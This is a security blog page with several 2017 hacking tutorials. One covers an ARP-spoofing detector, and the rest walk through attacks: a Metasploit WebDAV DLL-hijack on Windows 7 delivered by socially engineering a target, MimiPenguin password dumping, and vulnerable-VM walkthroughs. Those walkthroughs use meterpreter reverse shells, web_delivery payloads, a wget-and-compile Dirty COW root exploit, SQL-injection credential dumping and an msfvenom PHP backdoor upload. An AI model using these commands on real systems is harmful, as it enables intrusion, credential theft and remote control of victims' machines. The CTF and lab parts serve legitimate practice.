Hacking Articles|Raj Chandel's Blog

How to Detect Sniffer in Your Network using shARP

at 8:55 AM Wednesday, April 19, 2017 0 comments

This article is written to introduce a new lunch tool shARP is an anti-ARP-spoofing program and uses active scanning process to identify any ARP-spoofing event.

ARP spoofing allows an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks. Our anti- ARP spoofing program, (shARP) detects the presence of a third party in a private network actively. It has 2 mode: defensive and offensive.

Defensive mode protects the end user from the spoofer by disconnecting the user's system from the network and alerts the user by an audio message.

Offensive mode disconnects the user's system from the network and further kicks out the attacker by sending de-authentication packets to his system, unable him to reconnect to the network until the program is manually reset.

The program creates a log file (/usr/shARP/) containing the details of the attack such as, the attackers Mac address, Mac vendor time and date of the attack. We can identify the NIC of the attackers system with the help of the obtained Mac address. If required the attacker can be permanently banned from the network by feeding his Mac address to the block list of the router.

Let’s start!

Open the terminal in kali Linux and type following command to download it

Git clone https://github.com/europa502/shARP.git

If the user wants to secure his network by scanning for any attacker he can run the program. The program offers a simple command line interface which makes it easy for the new users. Now type following command to run this program:

Chmod 777 shARP.sh

./sharp.sh -h

Then we had used zanti for sniffing in the network and start MIMT attack on selected target IP: 192.168.1.9 so that we can view its network traffic.

When the user runs the program in defensive mode, As soon as the program detects a spoofer in the network, and it disconnects the user’s system from the network so as to protect the private data being transferred between the system and the server. It also saves a log file about the attacker for further use.

./sharp.sh –d eth0

From screenshot you can the highlighted text is showing the Mac address of android phone try to perform spoofing.

Now when it finds spoofing in the network, it disconnects the user from the network. From screenshot you can see now user is assign only its localhost IP.

Exploit Windows 7 PC using Torrent File

at 8:45 AM Monday, April 17, 2017 0 comments

Through this article, you will learn WebDAV application DLL hijacking exploitation using Metasploit framework and try to hack the victim through malicious code execution.

Attacker: Kali Linux

Target: Window 7 (torrent)

Let’s start!!!

Open the terminal and type msfconsole to load metasploit framework.

This module presents a directory of file extensions that can lead to code execution when opened from the share. The default EXTENSIONS option must be configured to specify a vulnerable application type.

Use exploit/windows/browser/webdav_dll_hijacker

msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp

msf exploit(webdav_dll_hijacker) >set lhost 192.168.0.107

msf exploit(webdav_dll_hijacker) >set extensions torrent

msf exploit(webdav_dll_hijacker) >exploit

It has generate a malicious code which you can perceive from screenshot the highlighted text \\192.168.0.107\documents\, so now being an attacker you are suggested to share this link to your targeted client using social engineering.

Once you have shared malicious code link to the client then must for your meterpreter session, now when client will open the link he will be intended to a document folder with many file extensions and attacker will receive his meterpreter session.

Hence meterpreter session 1 opened successfully now we are connected with target through port 4444.

msf exploit(webdav_dll_hijacker) >sessions 1

meterpreter> sysinfo

NOW TRY YOURSELF GOOD LUCK!!!

Dump Cleartext Password in Linux PC using MimiPenguin

at 9:13 PM Saturday, April 15, 2017 0 comments

Hello friends! Through this article we are introducing a new tool MINIPENUIN between us, which can utilize for fetching login of Linux system in same way as MIMIKATZ.

A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.

Takes advantage of clear text credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. Will attempt to calculate each word's probability by checking hashes in /etc/shadow, hashes in memory, and regex searches.

Let’s begin

Open the terminal and type following command to download it from git hub.

Cd Desktop

git clone https://github.com/huntergregal/mimipenguin.git

cd mimipenguin

Now run the bash file to catch the clear text credential

./mimipenguin.sh

From screenshot you can see I have got login credential root: toor.

Hack the Nightmare VM (CTF Challenge)

at 10:18 AM Wednesday, April 12, 2017 0 comments

Today we are going to solve Wallaby’s Nightmare CTF which is a new VM challenge of vulnhub where attacker has to achieve root flag of the targeted VM machine; you can download it from here.

LET’S BEGIN!

As we always start from network so that we can have target IP. In your kali Linux open the terminal and type netdiscover, now from screenshot you can see list of IP. Here 192.168.0.101 is my target IP.

Enumerate the target through aggressive scan; type following command for nmap scanning:

nmap -p- A 192.168.0.101

So here I found three ports 22, 80, 6667 are open.

Since port 80 is open I look toward browser and explore target ip 192.168.0.101 where I found a comment “enter a username to get started with this CTF” then I type the name “RAJ” and click on submit so that we could move forward into start the game.

When I clicked on submit tab it linked to next web page where you can read the assign username for this CTF from screenshot now we can start this CTF when we will click on given link start the CTF!

Next web page open with exclusive warning that Mr. Wallaby found raj is trying to penetrate inside the server so user “raj” is under his observation. Then soon after reading this threat I observe at its URL I thought it might be vulnerable to etc/passwd same as LFI attack.

Then I try browse following in URL 192.168.1.101/?page=/etc/passwd though the web page stand up with raw data but nothing was quite useful in this web page. And when I refresh it I lose connection from port 80. As raj was threaten by Wallaby ;-)

Again I move toward nmap so that I can make sure about port 80 but here I found a new port 60080 is open for http service as you can perceive this thing from given screenshot.

Then I next my next tool dirb

Dirb http://192.168.0.101:60080/?page=

Now from screenshot you can see the result and currently we will look toward highlighted directory.

So when I browse 192.168.0.101:60080/?page=mailer in URL the resultant web page gets opened and I found nothing especial here except “coming soon guys!”

Then I look after page source code to get some clue, here inside HTML code the anchor tag contains a link for another file which you can see from screenshot.

Again I browse above highlighted text 192.168.0.101:60080/?mailer&mail=pwd in URL and the web page comes outside with /var/www/html

Hence we can say that the current page might good for executing malicious comment as command.

Now load metasploit framework to connect with victim through reverse connection

Msfconsole

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>set lhost 192.168.0.106 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set svrport 8081

msf exploit (web_delivery)>exploit

Now copy the generated command php….UvrG’));” and send it to target

From screenshot you can see I have paste above malicious PHP comment inside url in hope to get reverse connection inside metasploit.

So when I execute this comment I receive meterpreter session and get connected with victim shell

Meterpreter> sysinfo

Meterpreter>shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py

cd /tmp

Now use “Dirtycow exploit” therefore type following command to download this exploit inside tmp folder of victim.

Wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c

Now type following command to compile your exploit so that it can run successfully inside your Kali Linux.

gcc cowroot.c –o cowroot -pthread

Now we can run our exploit to achieve root permission and try to capture the flag

./cowroot

cd /root

Cat flag.txt

Congratulation!!! We have captured the flag which you can see from screenshot and beat this task………..

Hack the Bot challenge: Dexter (Boot2Root Challenge)

at 7:36 AM 0 comments

Hi friends! Today we are going to face Bot challenge in new VM machine of vulnhub design by Mr. Brian Wallace. In this tutorial you will how to access root privilege by generating malicious bot. you can download this challenge from here.

Let’s start!!!

Open the terminal of Klai Linux to Identify the target in your network using netdiscover command.

Netdiscover

From screenshot you can see the highlighted target IP : 192.168.1.105

Enumerate open port of targeted IP using nmap therefore type following command:

nmap -p- -Pn 192.168.1.105

From its scanning result we come to know that port 22, 80, 111, 55844 are open ports.

Seeing as port 80 is open I come across towards browser and look at target IP 192.168.1.105. Here the web page was pointing out towards two more different links “Panel” and “Dexter Analysis for a different botnet”.

When I visit to second link it was redirected to another web site and I found this link is not for our use but when I click on “panel” this linked me to a login page.

So now I was at login page and I have no idea for its username: password here I also try sql login form injection but couldn’t breach this login page.

Now next I choose dirbuster for directory brute force attack to step forward in expectation to get some directories inside it.

From screenshot you can perceive the files and directories which I found through brute force attack. Next we need to explore these directories in browser so that we can find our any clue to breach login page.

I start with upload.php where we can upload our malicious file or backdoor as you can see from screenshot I try to upload hacked.php file but nothing happened. Then I try to explore another directory but unable to find any clue regarding this task.

When I investigate more, then after wasting much I found apart from all directories only gateway.php was suffering from blind SQL injection vulnerable but here the post parameter was encoded with base 64.

Now attacker has two options either configure sqlmap to retrieve credential or download relevant exploit Dexter Casino Loader SQL Injection given by Brian Wallace. I had use this exploit to find out login credential. You can download it from here.

Once you have downloaded it then type following command in terminal:

Python 31686.py dump http://192.168.1.106/Panel/gateway.php

Now you will get login credential for bot panel.

Then I typed above fetched username and password into login form.

The panel has three basic features; bot control, dump viewer, and file upload. Without wasting time I click on upload options.

Now again I will try to upload php backdoor so that we get reverse connection of target system.

Now use msfvenom to generate malicious PHP script and type following command.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text highlighted text further we will past it inside text document and saved with shell.php and multi handler inside metasploit.

Now go back to upload directory and upload shell.php now you can see from given image the shell.php file is successfully upload inside /panel/exes.